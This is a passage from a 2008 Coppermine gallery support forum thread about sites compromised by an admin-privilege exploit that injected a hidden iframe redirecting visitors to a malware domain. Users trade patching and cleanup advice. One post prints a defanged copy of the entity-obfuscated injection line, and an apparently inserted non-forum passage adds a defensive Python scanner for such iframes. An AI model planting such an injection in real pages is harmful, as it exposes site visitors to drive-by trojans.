Author Topic: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?  (Read 108118 times)
slausen
Coppermine regular visitor
**
Posts: 67


« Reply #160 on: April 14, 2008, 12:11:29 am »

Deleting bridge/coppermine.inc.php doesn't make sense.

If you are not bridged you will bring down your gallery.
If you are bridged then you are not vulnerable there to begin with.

Deleting update.php is reasonable, deleting upload.php is reasonable if you don't use http/uri uploads.

Thanks for that info Nibbler. Very helpful.

What versions of cpg is the version of 'bridge/coppermine.inc.php' that you referenced in your link compatible with?

Or alternatively, since I am not using bridging, is there a way to turn it off completely, and delete the entire bridge folder?
Logged
mickyd
Coppermine newbie

Posts: 4


« Reply #161 on: April 14, 2008, 12:13:03 am »

My site has been hacked and I have been watching this thread in the hope of finding a resolution.

I have no idea of the history behind Marians post.
But I support her sentiments regarding the attitude of moderators.
I appreciate any work done by volunteers.
I happen to run my Coppermine site for Mature Coppermine users.
I spend a great deal of my time (for free) explaining to less knowledgeable users the intricacies of using the software.
I get asked the same (some might think stupid) questions again and again.
But I would never even think of talking to them the way moderators talk on this support forum.
Not just on this 'stressed' thread but normally.
The power seems to have infected them.

A scared-to-post (up until now) Coppermine user.
Logged
pspmichael
Coppermine newbie

Posts: 2


« Reply #162 on: April 14, 2008, 01:01:58 am »

Joachim,

I hope this information is helpful to you.  If not, maybe it will be to someone else.

On my site I was running the previous version of Coppermine.  When I went to cPanel to see what it showed, it had a warning that I needed to upgrade my Coppermine, I was down by 1 upgrade.  Since I wasn't sure whether that would help or not, I held off. 

Long story short, none of my Coppermine files were touched.  However every php and html file for my WebCalendar were infected with the iframe statement.  Since my calendar is easily rebuilt, I simply removed it from my site, did the upgrade to Coppermine and then reinstalled the calendar.  I haven't had a problem since. 

Now that I was up and running again, I thought I would check out what exactly happened.  The files that were infected simply had an added line, an iframe statement at the bottom of each file.  It was easy enough to go through and edit the 200 plus files, just tedious.  I'm not sure how to safely put this in here, so I removed the command brackets, some spaces, backslashes and put a period between each number.  That might be overkill but I would rather overkill than risk it happening here.  The line I had in my files was an iframe command, something I'm not at all familiar with.  This is the line without the items I mentioned and with all the periods I mentioned:
php/echo 'iframesrc="&#1.0.4;&#1.1.6;&#1.1.6;&#1.1.2;&#5.8;&#4.7;&#4.7;&#9.9;&#1.0.0;&#1.1.2;&#1.1.7;&#1.1.8;&#9.8;&#1.0.4;&#1.0.2;&#1.2.2;&#1.2.2;&#4.6;&#9.9;&#1.1.1;&#1.0.9;&#4.7;&#1.0.0;&#1.0.8;&#4.7;&#9.7;&#1.0.0;&#1.1.8;&#5.3;&#5.7;&#5.6;&#4.6;&#1.1.2;&#1.0.4;&#1.1.2;" width=1 height=1   iframe>';

Michael
I hope this helps someone else to get out of the problem this brought on.  And I hope somehow the person who did this is repaid tenfold for what he did. 
Logged
Nibbler
Dev Team member
****
Gender: Male
United Kingdom United Kingdom

Posts: 19439



WWW
« Reply #163 on: April 14, 2008, 01:29:46 am »

Or alternatively, since I am not using bridging, is there a way to turn it off completely, and delete the entire bridge folder?

If you're not using bridging then you are not vulnerable. That file is not used when bridged. You can't delete the bridge folder since standalone Coppermine is just another type of bridge as far as the code is concerned.
Logged

I don't care about what they say, I won't live or die that way.
mr.goose
Tester
*
Posts: 34


WWW
« Reply #164 on: April 14, 2008, 04:14:57 am »

If you're not using bridging then you are not vulnerable. That file is not used when bridged. You can't delete the bridge folder since standalone Coppermine is just another type of bridge as far as the code is concerned.

Sorry Nibbler. I read and re-read this many times. It just doesn't make sense to me. OK. If I am not using bridging then I am not vulnerable. But if Coppermine is just another type of bridge as far as the code is concerned and I am using Coppermine then ipso facto I am using bridging. Therefore I am vulnerable. Aren't I?

Also, has the Dev Team figured out how the bad guys are changing the cpg_config database table in the first place? That part really scares me.
Best wishes, G
Logged
Nibbler
Dev Team member
****
Gender: Male
United Kingdom United Kingdom

Posts: 19439



WWW
« Reply #165 on: April 14, 2008, 04:23:00 am »

OK, maybe that wasn't as clear as it could have been. All galleries use udb_base.inc.php plus the bridge file for that app. If you use standalone Coppermine that means udb_base.inc.php + coppermine.inc.php. If you use phpbb then it's udb_base.inc.php + phpbbxxx.inc.php. If you didn't go through the bridge manager then you use the 'coppermine' bridge. It's confusing but a good idea as far as the code goes (polymorphism). So if you bridge to some forum or CMS you don't use coppermine.inc.php at all.

The exploit allows the attacker to gain admin privileges, so anything goes.
Logged

I don't care about what they say, I won't live or die that way.
gertiebeth
Coppermine newbie

Gender: Female
Posts: 7


WWW
« Reply #166 on: April 14, 2008, 05:05:47 am »

The release will be whenever GauGau finds time to put it together, it takes quite some time and effort.

Until then, you can replace your copy of bridge/coppermine.inc.php with the fixed copy in svn, here.
This copy of /bridge/coppermine.inc.php breaks all of my stand-alone and modded-by-stramm versions of CPG 1.4.17. The errors I receive are:

For displayimage.php:
Code:
There was an error while processing a database query

And when logging in as admin, the entire gallery goes down with the error:
Code:
Fatal Error:
Logged

Gertie
Nibbler
Dev Team member
****
Gender: Male
United Kingdom United Kingdom

Posts: 19439



WWW
« Reply #167 on: April 14, 2008, 05:40:18 am »

I expect Stramm will provide an updated version once 1.4.18 is released.
Logged

I don't care about what they say, I won't live or die that way.
gertiebeth
Coppermine newbie

Gender: Female
Posts: 7


WWW
« Reply #168 on: April 14, 2008, 07:17:27 am »

I expect Stramm will provide an updated version once 1.4.18 is released.
The errors are present on my non-modded, stand-alone galleries as well. Has anyone been successful in using this new 1.4.18 /bridge/coppermine.inc.php file?
Logged

Gertie
slausen
Coppermine regular visitor
**
Posts: 67


« Reply #169 on: April 14, 2008, 08:19:40 am »

OK, maybe that wasn't as clear as it could have been. All galleries use udb_base.inc.php plus the bridge file for that app. If you use standalone Coppermine that means udb_base.inc.php + coppermine.inc.php. If you use phpbb then it's udb_base.inc.php + phpbbxxx.inc.php. If you didn't go through the bridge manager then you use the 'coppermine' bridge. It's confusing but a good idea as far as the code goes (polymorphism). So if you bridge to some forum or CMS you don't use coppermine.inc.php at all.

The exploit allows the attacker to gain admin privileges, so anything goes.

Hi Nibbler-

Thanks for providing us with this info, but I am still unclear - so if I am not bridging to another app, and am running coppermine standalone, then I AM vulnerable?

Given that several people have posted that they have had problems with the new coppermine.inc.php file, what is the recommended procedure to protect myself? Which version(s) of coppermine are compatible with the new file? If I've removed upload.php and update.php from the server, do I still need to take action on coppermine.inc.php or am I protected since they won't be able to do the SQL injection using the upload.php file?

Thanks.
Logged
volksfahrer.nl
Coppermine newbie

Posts: 2


« Reply #170 on: April 14, 2008, 10:05:22 am »

Is it wise to wait for version .18 so I won't have to install all kinds of patches?
And can you give me an idea of how long it's gonna take until .18 is done?
I know it's been worked on but are we talking days, weeks or months?

Thank you.
Logged
Nibbler
Dev Team member
****
Gender: Male
United Kingdom United Kingdom

Posts: 19439



WWW
« Reply #171 on: April 14, 2008, 10:08:26 am »

Today.
Logged

I don't care about what they say, I won't live or die that way.
bugmenot
Coppermine newbie

Posts: 7


« Reply #172 on: April 14, 2008, 12:49:22 pm »

My site was also hacked by this cdpuvbhfzz.com site. If I visited a hacked page am I (or my visitors) at risk of being infected with a virus? Does anyone know exactly what that iframe does? Thanks all.
Logged
Hercules24
Coppermine regular visitor
**
Posts: 66


WWW
« Reply #173 on: April 14, 2008, 12:58:31 pm »

I was using IE 6, and I didn't get any virus warnings, only IE crashed when visiting the infected gallery.
Other people claimed that the redirect to the dirty site tried to install a trojan, so better clean up the mess asap and update to 1.4.18 now!
Logged
davec
Coppermine novice
*
Posts: 30


« Reply #174 on: April 14, 2008, 02:30:06 pm »

I was hacked and the easiest way I found to deal with it was as follows.

Firstly upgrade to the latest version if you have not done so as per normal instructions. I then checked all files and folders and found the ones where the date was different. I was hacked on 9th April it seems. I found the files changed on that date etc and any that did not match the newly downloaded files were either removed or the offending code deleted. Check your anycontent.php, includes/config.inc.php and also your album folders.

I then checked the files and folders online against a local copy to make sure there were no mystery additions. Seems to have done the trick.

Hope it helps some of you?
Logged
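The two posts above describe the same clean-up: find web files modified around the compromise date and look for the appended 1x1 iframe whose src is hidden behind decimal HTML entities. The following is an added example (not code from the thread or from the Coppermine project) that automates that check; the directory layout, file names and the example.invalid destination are constructed for the demo.

```python
import html
import re
import tempfile
import time
from pathlib import Path

# Shape of the injection described in the thread: an iframe whose src is a run
# of decimal entities (&#104;&#116;... decodes to "http...") and/or that is
# sized 1x1, appended as a trailing line to each .php/.html file.
IFRAME_RE = re.compile(r'<iframe[^>]*src\s*=\s*["\']([^"\']+)["\'][^>]*>', re.I)
ENTITY_RUN_RE = re.compile(r'(?:&#\d+;){8,}')  # a long entity run is the tell

def suspicious_iframes(text):
    """Return (raw_src, decoded_src) for each iframe that is entity-obfuscated
    or sized 1x1. Decoding shows the real destination for incident notes."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        tag, src = m.group(0), m.group(1)
        tiny = (re.search(r'width\s*=\s*["\']?1\b', tag, re.I)
                and re.search(r'height\s*=\s*["\']?1\b', tag, re.I))
        if ENTITY_RUN_RE.search(src) or tiny:
            hits.append((src, html.unescape(src)))
    return hits

def scan_tree(root, modified_since, exts=(".php", ".html", ".htm")):
    """Walk `root`, look only at web files whose mtime is after `modified_since`
    (epoch seconds), and map each relative path to the iframes found in it."""
    findings = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in exts:
            continue
        if path.stat().st_mtime < modified_since:
            continue
        hits = suspicious_iframes(path.read_text(errors="replace"))
        if hits:
            findings[str(path.relative_to(root))] = hits
    return findings

def demo():
    """Constructed sample tree: one clean file and one with the appended line."""
    root = tempfile.mkdtemp()
    (Path(root) / "index.php").write_text("<?php echo 'hello'; ?>\n")
    obfuscated = "".join(f"&#{ord(c)};" for c in "http://example.invalid/x.php")
    (Path(root) / "cal").mkdir()
    (Path(root) / "cal" / "day.php").write_text(
        "<?php echo 'calendar'; ?>\n"
        f"<?php echo '<iframe src=\"{obfuscated}\" width=1 height=1></iframe>'; ?>\n")
    # Files written just now, so "changed within the last hour" selects them.
    return scan_tree(root, modified_since=time.time() - 3600)
```

Run `demo()` to see the flagged file and the decoded destination; on a real site, point `scan_tree` at the web root with the compromise date as `modified_since` and compare the flagged files against a clean download before editing them.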
davec
Coppermine novice
*
Posts: 30


« Reply #175 on: April 14, 2008, 02:36:31 pm »

My site was also hacked by this cdpuvbhfzz.com site. If I visited a hacked page am I (or my visitors) at risk of being infected with a virus? Does anyone know exactly what that iframe does? Thanks all.

Well on my PC my Anti Virus picked up that it was trying to install a trojan on to the computer. This was only apparent when I tried opening the site in IE7. I only did that after odd text appeared on the page when displayed in FF.
Logged
Llama8668
Coppermine newbie

Posts: 16


« Reply #176 on: April 14, 2008, 02:42:41 pm »

The temp build of the coppermine.inc file works okay for me (I just overwrote the 4.1.7 file and it hasn't displayed any errors that I've seen). I have seen some Fatal Error: messages, however this tends to be my host playing up. So far all I've done is upgrade to 4.1.7, attempted to remove all traces of the .Zip/.Jpg exploit files and tried inserting PHP.ini files to turn off register_globals.

In terms of the effects on browsers, Firefox and IE6 appear to handle infected pages okay (to the extent that they may not even show that they're making calls to the cdpuvbhfzz domain). IE 7 seems to crash when infected pages are encountered, though this may be influenced by the type of anti-virus software installed (McAfee appears to warn when infected pages are visited).
Logged
Joachim Müller
Administrator
*****
Gender: Male
Germany Germany

Posts: 44907


aka "GauGau"


WWW
« Reply #177 on: April 14, 2008, 05:56:23 pm »

There is no such thing as coppermine v4.1.7. More accuracy please.

tried inserting PHP.ini files to turn off register_globals.
Ask your webhost to turn that silly and dangerous setting off server-wide.

As Nibbler suggested: cpg1.4.18 has been released today. Everybody calm down and upgrade.
Logged
Cel
Coppermine newbie

Posts: 9


« Reply #178 on: April 14, 2008, 06:52:09 pm »

Have removed/overwritten everything which changed on the 9th (when my site was hit) including the 'JPG' file. Installed 1.4.18 (thanks guys for coming up with this so quickly - much appreciated). Set the config back to what it should be, and hopefully restored the gallery to normal working minus whatever the vulnerability was. The only remaining niggle is that I keep seeing messages here saying, 'it's not sufficient to update, you have to sanitize the site'. But when I search for instructions as to how to do so, I draw a blank. If it involves something other than the above, a link would be welcome. Thanks again.
Logged
capecodgal
Coppermine frequent poster
***
Posts: 119


« Reply #179 on: April 14, 2008, 08:11:20 pm »

UGHHHHHH!!!! Ok this nightmare is continuing - last week someone hacked into a bunch of sites at one of my hosts- the issues w/ the config being all messed up or the re-directing via the uploaded file; she restored everybody's sites and we all upgraded to the .16 then the .17 releases and all is ok... for the time being and I leave for Boston for the weekend hoping all is well;

Now I get back from the funeral and my co-web on another set of sites tells me after what happened on the first host she upgraded ALL of our sites on our purchased hosting (separate servers) to the .17 release to be sure nothing happened to them; then today each and every one of them was hacked into!!!! Then she e-mails me stating that a .18 version was released and it has some major security issues so she doesn't want to load that but the .17 release apparently must have had the same issues or similar as each and every site we have running that version is now hacked and pointing to this stupid cdpuv website; this is such a mess to clean up and of course the paid hosting doesn't have auto backups so we are totally S.O.L!! Luckily these sites were just getting launched so to start over is not going to kill us and she is talking to the host to see what they can do.

I am posting this for 2 reasons.....
#1 apparently this attack got into our CPANEL and affected each site hosted on that account (even toasted our wordpress blogs) so any of you being hacked watch out and restore asap before other sites on your servers are affected and you lose everything
#2 I have been reading through the posts to see what resolution will be or if it has been figured out yet where the issue is and when it will be fixed but everything seems so sporadic as some people have this mod or that mod, etc it seems the issue is in CPG to me as that is really what we all have in common and as far as the URI uploads (uploading via a URL) my first host indicated those have been disabled on her servers for years now so she didn't think that was how the attacks were happening. What else can we do to prevent this from happening again; anyone had any luck taking the gallery offline for the time being or removing the links on our sites to the gallery or are they just doing a general search for "powered by coppermine" or something like that. Basically I want to do whatever I can to hide my galleries for the next few days/ weeks even if they need to go offline.

Thanks for ANY direction any of you can give -
Logged